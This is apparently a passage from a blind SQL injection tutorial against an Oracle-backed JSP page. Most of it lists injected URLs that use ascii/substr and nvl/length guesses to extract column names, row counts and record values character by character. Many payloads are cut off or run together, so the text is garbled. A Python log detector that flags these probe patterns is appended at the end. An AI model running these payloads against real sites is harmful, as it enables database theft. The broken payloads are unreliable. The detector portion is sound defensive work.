[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
The following guesses the third character of the first field of the first column: A
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
The following guesses the second column:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 
2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
The first character of the first record is:
4. Guessing the data values:
The data value length is one digit: 1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0>nvl(length((SELECT COUNT(*)FROM AD)),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)
Data length: 9 records
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 55>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 56>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
The following guesses the record values
Row 1, column 1 record: length 1, value 1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
Row 1, column 1 record: length 1, value 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
Row 2, column 1 record: length 1, value 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
Row 2, column 2 record: length 1, value 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
Guessing the length of the third record: (the other records follow in the same way)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM
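The captured requests above share two fixed shapes (`N=ascii(substr((SELECT ...),pos,1))` and `N=nvl(length((SELECT ...)),0)`), which makes this enumeration easy to find in a web access log. The following is an added example, not part of the original article or of cnsafersi: it groups such probes per client and subquery and reports what was being read. The log lines are constructed from the page's payloads, the client addresses are placeholders, and `likely_value` assumes the tool stops at the first equality test that holds, as the sequences on this page do.

```python
import re
from urllib.parse import quote, unquote_plus, urlsplit

# Access-log line: client address and request target (common log format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# The two probe shapes that appear in the requests listed on this page.
CHAR_PROBE = re.compile(
    r"and\s+(\d+)\s*(>=|>|=)\s*ascii\s*\(\s*substr\s*\(\s*\((select\b.*)\)"
    r"\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)", re.I | re.S)
LEN_PROBE = re.compile(
    r"and\s+(\d+)\s*(>=|>|=)\s*nvl\s*\(\s*length\s*\(\s*\((select\b.*)\)"
    r"\s*\)\s*,\s*0\s*\)", re.I | re.S)
# Oracle dictionary views the page's probes read from.
CATALOG = re.compile(r"\b(USER_TABLES|COLS)\b", re.I)


def parse_probe(target):
    """Return the probe carried by one request target, or None if it has none."""
    parts = urlsplit(target)
    query = unquote_plus(parts.query)  # undo %20 / %3E before matching
    for kind, rx in (("char", CHAR_PROBE), ("length", LEN_PROBE)):
        m = rx.search(query)
        if m:
            return {
                "path": parts.path,
                "kind": kind,
                "guess": int(m.group(1)),
                "op": m.group(2),
                # Normalise case and spacing so repeated probes group together.
                "subquery": " ".join(m.group(3).upper().split()),
                "position": int(m.group(4)) if kind == "char" else 0,
            }
    return None


def detect(lines, min_probes=3):
    """Group probes by client, path, subquery and position; flag repeated guessing."""
    groups = {}
    for line in lines:
        m = LOG_RE.match(line)
        probe = parse_probe(m.group(2)) if m else None
        if probe is None:
            continue
        key = (m.group(1), probe["path"], probe["kind"],
               probe["subquery"], probe["position"])
        groups.setdefault(key, []).append((probe["guess"], probe["op"]))
    findings = []
    for (client, path, kind, subquery, position), probes in groups.items():
        if len(probes) < min_probes:
            continue
        equal = [guess for guess, op in probes if op == "="]
        last = equal[-1] if equal else None
        if last is not None and kind == "char":
            last = chr(last)  # the guess is an ASCII code
        findings.append({
            "client": client, "path": path, "kind": kind,
            "subquery": subquery, "position": position,
            "probes": len(probes),
            "touches_catalog": bool(CATALOG.search(subquery)),
            "likely_value": last,  # assumption: tool stopped on a true '='
        })
    return findings


def _line(client, payload=""):
    """Build one constructed log line; timestamp, status and size are made up."""
    target = "/index_kaoyan_view.jsp?id=117" + quote(payload, safe="=(),*")
    return f'{client} - - [10/Dec/2005:15:03:20 +0800] "GET {target} HTTP/1.1" 200 5120'


COUNT_Q = "(SELECT COUNT (*) FROM USER_TABLES)"
# Constructed sample: one ordinary visitor, then probes copied from this page.
SAMPLE_LOG = (
    [_line("198.51.100.20")]
    + [_line("203.0.113.7", f" And {g}=nvl(length({COUNT_Q}),0)") for g in (0, 2, 3)]
    + [_line("203.0.113.7", f" And {g}{op}ascii(substr({COUNT_Q},1,1))")
       for g, op in ((52, "="), (52, ">"), (49, "="))]
    + [_line("203.0.113.7", f" And {g}{op}ascii(substr({COUNT_Q},2,1))")
       for g, op in ((49, "="), (95, "="), (77, "="), (77, ">"),
                     (53, "="), (53, ">"), (51, "="))]
)

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Detection of this kind only scopes what a client enumerated; the requests stop working once the JSP binds `id` as a parameter (for example through a `PreparedStatement`) instead of concatenating it into the query text.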